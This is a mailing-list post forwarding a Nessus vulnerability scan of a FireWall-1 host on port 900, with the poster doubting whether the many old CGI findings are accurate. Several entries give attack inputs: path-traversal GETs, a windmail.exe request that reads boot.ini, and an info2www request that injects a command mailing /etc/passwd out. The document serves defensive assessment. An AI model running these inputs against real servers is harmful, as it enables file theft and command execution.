
[FW1] nessus scan of CPFW1 port 900



hi all,

any comments on the validity/accuracy of this report? since we
run solaris and nokia i doubt the *.exe concerns are valid.
i have no insight to the http configuration so it is difficult to
gauge what CP may have done. thanks /pc
 
------- Forwarded Message


Vulnerability found on port omginitialrefs (900/tcp)

       The file /wwwboard/passwd.txt exists.

       This file is installed by default with Matt's Script wwwboard
       software. This can be a high risk vulnerability if the
       password used is the same for other services. An attacker
       can easily take over the board by cracking the passwd.

       Solution : Configure the wwwadmin.pl script to put
       the passwd.txt file somewhere else.

       Risk factor : High
       CVE : CVE-1999-0953

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'wrap' CGI is installed. This CGI allows
       anyone to get a listing for any directory with mode +755.


       ** Note that all implementations of 'wrap' are not
       vulnerable. See the relevant CVE entry.

       Solution : remove it from /cgi-bin.

       Risk factor : Low/Medium
       CVE : CVE-1999-0149

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'windmail.exe' cgi is installed. 

       Some versions of this CGI script have a security flaw that lets 
       an attacker execute arbitrary commands on the remote server.

       To test this, make the following request :

       GET /cgi-bin/windmail.exe?-n%20c:\boot.ini%[email protected]

       (replace [email protected] by your real email address). 

       If you receive the content of the file boot.ini,
       then you are vulnerable.

       Solution : remove it from /cgi-bin. See www.geocel.com
       for a new version.

       Risk factor : Serious
       CVE : CAN-2000-0242

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       It may be possible for an attacker to reconfigure the 
       remote web server by requesting :

       GET /scripts/wsisa.dll/WService=anything?WSMadmin


       Solution : Edit the ubroker.properties file and change
       AllowMsngrCmds = 1
       to :
       AllowMsngrCmds = 0


       Risk factor : High
       CVE : CAN-2000-0127

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'websendmail' CGI is installed. This CGI has
       a well known security flaw that lets an attacker execute arbitrary
       commands with the privileges of the http daemon (usually root or nobody).

       Solution : Remove it from /cgi-bin.

       Risk factor : Serious
       CVE : CVE-1999-0196

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'webgais' CGI is installed. This CGI has
       a well known security flaw that lets an attacker execute arbitrary
       commands with the privileges of the http daemon (usually root or nobody).

       Solution : remove it from /cgi-bin

       Risk factor : Serious
       CVE : CVE-1999-0176

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       At least one of these file or directories is
       world readable :

       /webcart/orders/
       /webcart/orders/import.txt
       /webcart/carts/
       /webcart/config/
       /webcart/config/clients.txt
       /webcart-lite/orders/import.txt
       /webcart-lite/config/clients.txt

       This misconfiguration may allow an attacker to gather
       the credit card numbers of your clients.

       Solution : Do not make directories world readable.

       Risk factor : High
       CVE : CAN-1999-0610

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       It is possible to fill the hard disk of a server
       running OmniHTTPd by issuing the request :
       http://omni.server/cgi-bin/visadmin.exe?user=guest
       This allows an attacker to crash your web server.
       This script checks for the presence of the faulty CGI, but
       does not execute it.

       Solution : remove visadmin.exe from /cgi-bin.

       Risk factor : Medium/High
       CVE : CAN-1999-0970

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'uploader.exe' CGI is installed. This CGI has
       a well known security flaw that lets anyone upload arbitrary
       CGI on the server, and then execute them.

       Solution : remove it from /cgi-win.

       Risk factor : Serious
       CVE : CVE-1999-0177

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'upload.cgi' cgi is installed. This CGI has
       a well known security flaw that lets anyone upload arbitrary
       files on the remote web server.

       Solution : remove it from /cgi-bin.

       Risk factor : Serious

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The Cobalt 'siteUserMod' CGI is installed. 
       Older versions of this CGI allow any user to change the
       administrator password.

       Make sure you are running the latest version.

       Solution : 

       RaQ 1 Users, download :
       ftp://ftp.cobaltnet.com/
       pub/experimental/security/siteUserMod/RaQ1-Security-3.6.pkg

       RaQ 2 Users, download :
       ftp://ftp.cobaltnet.com/
       pub/experimental/security/siteUserMod/RaQ2-Security-2.94.pkg

       RaQ 3 Users, download :
       ftp://ftp.cobaltnet.com/
       pub/experimental/security/siteUserMod/RaQ3-Security-2.2.pkg


       Risk factor : High
       CVE : CAN-2000-0117

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       The remote web server has one of these shells installed
       in /cgi-bin :
       ash, bash, csh, ksh, sh, tcsh, zsh

       Leaving executable shells in the cgi-bin directory of
       a web server may allow an attacker to execute arbitrary
       commands on the target machine with the privileges of the 
       http daemon (usually root or nobody).

       Solution : Remove all the shells from /cgi-bin.

       Risk factor : Serious
       CVE : CAN-1999-0509

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       At least one of these CGI scripts is installed :

       hello.bat
       echo.bat

       They allow any attacker to execute commands
       with the privileges of the web server process. 

       Solution : Delete all the *.bat files from your cgi-bin/ 
       directory
       Risk factor : High
       CVE : CAN-2000-0213

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'plusmail' CGI is installed. Some
       versions of this CGI have a well known security flaw that 
       lets an attacker execute arbitrary
       commands with the privileges of the http daemon 
       (usually root or nobody).

       Solution : remove it from /cgi-bin. No patch yet

       Risk factor : Serious
       CVE : CAN-2000-0074

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'Perl' CGI is installed and can be launched
       as a CGI. This is equivalent to giving a free shell to an attacker, with the
       http server privileges (usually root or nobody).

       Solution : remove it from /cgi-bin

       Risk factor : Serious
       CVE : CAN-1999-0509

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'nph-publish.cgi' is installed. This CGI has
       a well known security flaw that lets an attacker to execute arbitrary
       commands with the privileges of the http daemon (usually root or nobody).

       Solution : remove it from /cgi-bin.

       Risk factor : Serious

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       The CGI /scripts/tools/newdsn.exe is present.

       This CGI allows any attacker to create files
       anywhere on your system if your NTFS permissions
       are not tight enough, and can be used to overwrite
       DSNs of existing dabases.

       Solution : Remove newdsn.exe
       Risk factor : High
       CVE : CVE-1999-0191

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       The file /admin-serv/config/admpw is readable.

       This file contains the encrypted password for the Netscape
       administration server. Although it is encrypted, an attacker
       may attempt to crack it by brute force.

       Solution : Remove read access permissions for this file and/or stop
       the netscape admininistration server.

       Risk factor : Medium

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       The file /ncl_items.html exists on the remote system.
       It is very likely that this file will allow an attacker
       to reconfigure your Tektronix printer.

       An attacker can use this to prevent the users of your
       network from working properly by preventing them
       from printing their files.

       Solution : Filter incoming traffic to port 80 to this
       device, or disable the Phaserlink webserver on the
       printer (can be done by requesting http://printername/ncl_items?SUBJECT=2097)

       Risk factor : Low

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       It is possible to read
       any file on the remote system by prepending
       several dots before the file name.

       Example :

       GET ........../config.sys

       Solution : Disable this service and install
       a real Web Server.

       Risk factor : High
       CVE : CVE-1999-0386

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       The web server is probably susceptible to a common IIS vulnerability discovered by
       'Rain Forest Puppy'. This vulnerability enables an attacker to execute arbitrary
       commands on the server with Administrator Privileges. 

       See Microsoft security bulletin (MS99-025) for patch information.
       Also, BUGTRAQ ID 529 on www.securityfocus.com (http://www.securityfocus.com/bid/529

       Risk factor : High
       CVE : CVE-1999-1011

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'jj' CGI is installed. This CGI has
       a well known security flaw that lets an attacker execute arbitrary
       commands with the privileges of the http daemon (usually root or nobody).

       Solution : Remove it from /cgi-bin.

       Risk factor : Serious
       CVE : CVE-1999-0260

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'info2www' CGI is installed. This CGI has
       a well known security flaw that lets an attacker execute arbitrary
       commands with the privileges of the http daemon (usually root or nobody).

       Example:

       http://target/cgi-bin/info2www?'(../../../bin/mail your@email < /etc/passwd|)'

       Solution : Remove it from /cgi-bin or upgrade.

       Risk factor : Serious
       CVE : CVE-1999-0266

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       The use of /iisadmin is not limited to the loopback address.
       Anyone can use it to reconfigure your web server.

       Solution : Restrict access to /iisadmin through the IIS ISM
       Risk factor : High

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       Several versions of the 'icat' CGI allow a remote
       user to read arbitrary file on the target system. Make sure you
       are running the latest version of icat.

       Risk factor : Medium/High.

       Solution : Upgrade to the latest version of icat

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'handler' cgi is installed. This CGI has
       a well known security flaw that lets anyone execute arbitrary
       commands with the privileges of the http daemon (root or nobody).

       Solution : remove it from /cgi-bin.

       Risk factor : Serious
       CVE : CVE-1999-0148

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'guestbook.pl' is installed. This CGI has
       a well known security flaw that lets anyone execute arbitrary
       commands with the privileges of the http daemon (root or nobody).

       Solution : remove it from /cgi-bin.

       Risk factor : Serious
       CVE : CVE-1999-0237

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'guestbook.cgi' is installed. This CGI has
       a well known security flaw that lets anyone execute arbitrary
       commands with the privileges of the http daemon (root or nobody).

       Solution : remove it from /cgi-bin.

       Risk factor : Serious
       CVE : CVE-1999-0237

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'glimpse' cgi is installed. This CGI has
       a well known security flaw that lets anyone execute arbitrary
       commands with the privileges of the http daemon (root or nobody).

       Note that we could not actually check for the presence
       of this vulnerability, so you may be using a patched
       version.

       Solution : remove it from /cgi-bin.

       Risk factor : Serious
       CVE : CVE-1999-0147

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       The remote web server appears to be running with
       Frontpage extensions and lets the file 'authors.pwd'
       to be downloaded by everyone.

       This is a security concern since this file contains
       sensitive data.

       Solution : Contact Microsoft for a fix.

       Risk factor : Medium
       CVE : CVE-1999-0386

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       At least one of these CGI is installed :

       loadpage.cgi
       search.cgi

       If they come from the package EZShopper 3.0, they
       may be vulnerable to some security flaws that can
       allow an intruder to view arbitrary files and/or
       to execute arbitrary commands with the priviledges of
       the web server.

       Solution : Make sure that you are running the latest
       version of EZShopper, 
       available at http://www.ahg.com/software.htm#ezshopper
       Risk factor : High
       CVE : CAN-2000-0187

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The Excite for Webservers is installed. This CGI has
       a well known security flaw that lets anyone execute arbitrary
       commands with the privileges of the http daemon (root or nobody).

       Version 1.1 and newer are patched.


       Solution : if you are running a version older than 1.1, then
       upgrade it.

       Risk factor : Serious
       CVE : CVE-1999-0279

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       ServletExec has a servlet called 'UploadServlet' in its server
       side classes. UploadServlet, when invokable, allows an
       attacker to upload any file to any directory on the server. The
       uploaded file may have code that can later be executed on the
       server, leading to remote command execution.

       Solution : Remove it
       Risk Factor: Serious
       CVE : CAN-2000-1024

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       'dfire.cgi' is installed. This CGI has
       a well known security flaw that lets anyone execute arbitrary
       commands with the privileges of the http daemon (root or nobody).

       Solution : remove it from /cgi-bin.

       Risk factor : Serious
       CVE : CAN-1999-0913

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       The script /cart/cart.cgi is present.

       If this shopping cart system is the Dansie
       Shopping Cart, then it is very likely that it
       contains a backdoor which allows anyone to 
       execute arbitary commands on this system.

       Solution : use another cart system
       Risk factor : High
       CVE : CAN-2000-0252

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'Count.cgi' cgi is installed. This CGI has
       a well known security flaw that lets anyone execute arbitrary
       commands with the privileges of the http daemon (root or nobody).

       Solution : remove it from /cgi-bin.

       Risk factor : Serious
       CVE : CVE-1999-0021

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       'cgiwrap' is installed. This CGI has
       a well known security flaw that lets anyone execute arbitrary
       commands with the privileges of the http daemon (root or nobody).

       ** Note that all version of cgiwrap are not affected
       by this problem ! Consult your vendor.

       Solution : remove it from /cgi-bin.

       Risk factor : Serious

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'campas' cgi is installed. This CGI has
       a well known security flaw that lets anyone execute arbitrary
       commands with the privileges of the http daemon (root or nobody).

       Solution : remove it from /cgi-bin.

       Risk factor : Serious
       CVE : CVE-1999-0146

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       RedHat Linux 6.0 installs by default a squid cache manager cgi script with
       no restricted access permissions. This script could be used to perform a
       port scan from the cgi-host machine.

       Solution :
       If you are not using the box as a Squid www proxy/cache server then
       uninstall the package by executing:
       /etc/rc.d/init.d/squid stop 
       rpm -e squid

       If you want to continue using the Squid proxy server software, make the
       following actions to tighten security access to the manager interface:
       mkdir /home/httpd/protected-cgi-bin
       mv /home/httpd/cgi-bin/cachemgr.cgi /home/httpd/protected-cgi-bin/

       And add the following directives to /etc/httpd/conf/access.conf and
       srm.conf:

       --- start access.conf segment ---
       # Protected cgi-bin directory for programs that
       # should not have public access
       order deny,allow
       deny from all
       allow from localhost
       #allow from .your_domain.com
       AllowOverride None
       Options ExecCGI
       --- end access.conf segment ---

       --- start srm.conf segment ---
       ScriptAlias /protected-cgi-bin/ /home/httpd/protected-cgi-bin/
       --- end srm.conf segment ---

       Risk Factor: High
       CVE : CVE-1999-0710

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       The Cart32 e-commerce shopping cart is installed.

       This software contains several security flaws :

       - it may contain a backdoor
       - users may be able to change the admin password remotely


       You should use something else.

       See also : http://www.cerberus-infosec.co.uk/advcart32.html

       Solution : use another shopping cart software
       Risk factor : High
       CVE : CAN-2000-0429

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)



       BizDB is a web databse integration product
       using perl CGI scripts. One of the scripts,
       bizdb-search.cgi, passes a variable's
       contents to an unchecked open() call and
       can therefore be made to execute commands
       at the privilege level of the webserver.

       The variable is dbname, and if passed a
       semicolon followed by shell commands they
       will be executed. This cannot be exploited
       from a browser, as the software checks for
       a referrer field in the HTTP request. A
       valid referrer field can however be created
       and sent programmatically or via a network
       utility like netcat.

       see also : http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm

       Risk factor : Serious
       CVE : CAN-2000-0287

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'bboard' servlet is installed in 
       /servlet/sunexamples.BBoardServlet. This servlet has
       a well known security flaw that lets anyone execute arbitrary
       commands with the privileges of the http daemon (root or nobody).

       Solution : remove it.

       Risk factor : Serious
       CVE : CVE-2000-0629

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       It is possible to access the remote host AxisStorpoint
       configuration by requesting :

       http://server/cd/../config/html/cnf_gi.htm

       Solution : upgrade to the latest version available at
       http://www.se.axis.com/techsup/cdsrv/storpoint_cd/index.html
       Risk factor : Serious
       CVE : CAN-2000-0191

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       The file /site/eg/source.asp is present.

       This file comes with the Apache::ASP package
       and allows anyone to write to files in the
       same directory.

       An attacker may use this flaw to upload his
       own scripts and execute arbitrary commands
       on this host.

       Solution : Upgrade to Apache::ASP 1.95
       Risk factor : Serious
       CVE : CAN-2000-0628

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'get32.exe' cgi is installed. This CGI has
       a well known security flaw that lets anyone execute arbitrary
       commands with the privileges of the http daemon (root or nobody).

       Solution : remove it from /cgi-bin.

       Risk factor : Serious

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       IIS comes with the sample site 'ExAir'. 
       Unfortunately, one of its pages,
       namely /iissamples/exair/search/search.asp, 
       may be used to make IIS hang, thus preventing 
       it from answering to legitimate clients.

       Solution : Delete the 'ExAir' sample IIS site

       Risk factor : Medium
       CVE : CVE-1999-0449

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       IIS comes with the sample site 'ExAir'. Unfortunately, one of its pages,
       namely /iissamples/exair/search/query.asp, may be used to make IIS hang,
       thus preventing it from answering to legitimate clients.

       Solution : Delete the 'ExAir' sample IIS site

       Risk factor : Medium.
       CVE : CVE-1999-0449

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       IIS comes with the sample site 'ExAir'. Unfortunately,
       one of its pages, namely /iissamples/exair/search/advsearch.asp, may
       be used to make II hang, thus preventing it from answering to legitimate
       clients.

       Risk factor : Medium/High.
       Solution : Delete the 'ExAir' sample IIS site
       CVE : CVE-1999-0449

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       The CGI /scripts/tools/mkilog.exe is present.

       This CGI allows an attacker to view and modify SQL database
       contents.

       Solution : Remove it
       Risk factor : Serious

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       Some Web Servers use a file called /robot(s).txt to make search engines and
       any other indexing tools visit their WebPages more frequently and
       more efficiently.
       By connecting to the server and requesting the /robot(s).txt file, an
       attacker may gain additional information about the system they are
       attacking.
       Such information as, restricted directories, hidden directories, cgi script
       directories and etc. Take special care not to tell the robots not to index
       sensitive directories, since this tells attackers exactly which of your
       directories are sensitive.

       Risk factor : Medium

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The Sambar webserver is running
       and the 'mailit.pl' cgi is installed. This CGI takes
       a POST request from any host and sends a mail to a supplied address. 

       See http://www.toppoint.de/~hscholz/sambar for more information.

       Solution : remove it from /cgi-bin.

       Risk factor : Serious

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       The mini-sql program comes with the
       w3-msql CGI which is vulnerable to a buffer overflow.

       An attacker may use it to gain a shell on this system.

       Solution : contact the vendor of mini-sql (http://hugues.com.au)
       and ask for a patch. Meanwhile, remove w3-msql from
       /cgi-bin

       Risk factor : High
       CVE : CAN-2000-0012

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       There is a buffer overrun in
       the 'php.cgi' CGI program, which will allow anyone to
       execute arbitrary commands with the same privileges as the
       web server (root or nobody).

       Solution : remove it from /cgi-bin.

       Risk factor : Serious
       CVE : CVE-1999-0058

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)


       It was possible to overflow a buffer in a CGI
       on the remote server by making the request :

       GET /ss?setsite=aaaa[....]aaaa

       An attacker may use this flaw to execute arbitrary
       code on this server.

       Solution : There is no fix at this time.
       Workaround : see http://w1.855.telia.com/~u85513179/index.html.

       Risk factor : High
       CVE : CVE-1999-0931

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       The 'imagemap.exe' cgi is installed. This CGI 
       is vulnerable to a buffer overflow that will allow a remote user
       to execute arbitrary commands with the privileges of your httpd
       server (either nobody or root).

       Solution : remove it from /cgi-bin.

       Risk factor : Serious
       CVE : CVE-1999-0951

                                                                                          

Vulnerability found on port omginitialrefs (900/tcp)

       It was possible to perform
       a denial of service against the remote
       HTTP server by sending it a long /cgi-bin relative URL. 

       This problem allows a cracker to prevent
       your Lotus Domino web server from handling requests.

       Solution : contact your vendor for a patch, or
       change your server. Consider changing cgi-bin mapping
       by something impossible to guess in server document of
       primary Notes NAB.

       Risk factor : Serious
       CVE : CVE-2000-0023

                                                                                          

Warning found on port omginitialrefs (900/tcp)

       a web server is running on this port

                                                                                          

Warning found on port omginitialrefs (900/tcp)

       The 'mailnews' cgi is installed. This CGI has
       a well known security flaw that lets an attacker execute arbitrary
       commands with the privileges of the http daemon (usually root or nobody).

       Solution : remove it from /cgi-bin.

       Risk factor : Serious

                                                                                          

Warning found on port omginitialrefs (900/tcp)

       The 'webdriver' cgi is installed. This CGI usually
       lets anyone access the Informix databases of the hosts that run it.

       ** Warning : Nessus only tested the presence of this CGI, it did not
       ** determine if you specific version is vulnerable to that problem

       Solution : remove it from /cgi-bin.

       Risk factor : Serious

                                                                                          

Warning found on port omginitialrefs (900/tcp)

       The 'test-cgi' cgi is installed. This CGI has
       a well known security flaw that lets an attacker read arbitrary
       files with the privileges of the http daemon (usually root or nobody).

       Solution : remove it from /cgi-bin.

       Risk factor : Serious
       CVE : CVE-1999-0070

                                                                                          

Warning found on port omginitialrefs (900/tcp)

       The 'printenv' CGI is installed.
       printenv normally returns all environment variables.

       This gives an attacker valuable information about the
       configuration of your web server, allowing them to focus their
       attacks.

       Solution : Remove it from /cgi-bin.

       Risk factor : Medium

                                                                                          

Warning found on port omginitialrefs (900/tcp)


       The CGI script ppdscgi.exe, part of the PowerPlay 
       Web Edition package, is installed.

       Due to design problems as well as some 
       potential web server misconfiguration 
       PowerPlay Web Edition may serve up data 
       cubes in a non-secure manner. Execution 
       of the PowerPlay CGI pulls cube data into 
       files in an unprotected temporary directory. 
       Those files are then fed back to frames in 
       the browser. In some cases it is trivial for an
       unauthenticated user to tap into those data 
       files before they are purged.

       Solution : Cognos doesn't consider this
       problem as being an issue, so they
       do not provide any solution.

       Risk factor : Medium

                                                                                          

Warning found on port omginitialrefs (900/tcp)

       The 'pagelog.cgi' cgi is installed. This CGI has
       a well known security flaw that lets an attacker create arbitrary
       files on the remote server, ending in .txt, and reading arbitrary
       files ending in .txt or .log

       *** Warning : this flaw was not tested by Nessus. Check the existence
       of /tmp/nessus_pagelog_cgi.txt on this host to find out if you
       are vulnerable or not.

       Solution : remove it from /cgi-bin.
       Risk factor : Serious
       CVE : CAN-2000-0940

                                                                                          

Warning found on port omginitialrefs (900/tcp)

       The 'nph-test-cgi' CGI is installed. This CGI has
       a well known security flaw that lets an attacker get a listing
       of the /cgi-bin directory, thus discovering which CGIs are installed
       on the remote host.

       Solution : remove it from /cgi-bin.

       Risk factor : Serious

                                                                                          

Warning found on port omginitialrefs (900/tcp)

       The 'finger' cgi is installed. It is usually
       not a good idea to have such a service installed, since
       it usually gives more troubles than anything else. 

       Double check that you really want to have this
       service installed.

       Solution : remove it from /cgi-bin.

       Risk factor : Serious
       CVE : CAN-1999-0197

                                                                                          

Warning found on port omginitialrefs (900/tcp)

       The 'dumpenv' cgi is installed. This
       CGI gives away too much information about the web server
       configuration, which will help a cracker.

       Solution : remove it from /cgi-bin.

       Risk factor : Low

                                                                                          

Warning found on port omginitialrefs (900/tcp)

       robot.txt contains the following:
       <html><head>
       <title>
       Authentication Form 
       </title> 
       </head> 
       <p> 
       <BODY BGCOLOR="#000000" TEXT="#00FF00"> 
       <FORM METHOD="POST" ACTION="http://172.20.160.1:900"> 

       <h3 align=left><font face="arial,helvetica">Client Authentication Remote 
       Service</font></h3> 

       <INPUT TYPE="hidden" NAME="ID" VALUE="3ad490e1023f"> <P>
       <INPUT TYPE="hidden" NAME="STATE" VALUE="1"><P>
       FireWall-1 message: User: <p> <P>

       Login : <INPUT NAME="DATA"> <P> 

       press submit when done: <INPUT TYPE="submit" 
       VALUE="Submit">. <P> 

       </FORM>
       <p> <P>
       </BODY>
       </html>


                                                                                          

Warning found on port omginitialrefs (900/tcp)


       The rpm_query CGI is installed. 

       This CGI allows anyone who can connect to this
       web server to obtain the list of the installed
       RPMs.

       This allows attacker to determine the version
       number of your installed services, hence making
       their attacks more accurate.

       Solution : remove this CGI from cgi-bin/
       Risk factor : Low
       CVE : CVE-2000-0192

                                                                                          

Information found on port omginitialrefs (900/tcp)

       The remote web server does not respect the HTTP protocol in that
       it does not send 404 error codes when a client requests a non-existent
       page.
       You are very likely to get false positives for the web checks.

                                                                                          

Warning found on port general/tcp


       The remote host uses non-random IP IDs, that is, it is
       possible to predict the next value of the ip_id field of
       the ip packets sent by this host.

       An attacker may use this feature to determine if the remote
       host sent a packet in reply to another request. This may be
       used for portscanning and other things.

       Solution : Contact your vendor for a patch
       Risk factor : Low

                                                                                          

Information found on port general/tcp

       Nmap found that this host is running Solaris 2.6 - 2.7

                                                                                          

Vulnerability found on port unknown (900/tcp)


       It was possible to make IIS use 100% of the CPU by
       sending it malformed extension data in the URL
       requested, preventing him to serve web pages
       to legitimate clients.

       Solution : Microsoft has made patches available at :
       - For Internet Information Server 4.0:
       http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20906
       - For Internet Information Server 5.0:
       http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20904

       Risk factor : Serious
       CVE : CVE-2000-0408

------- End of Forwarded Message


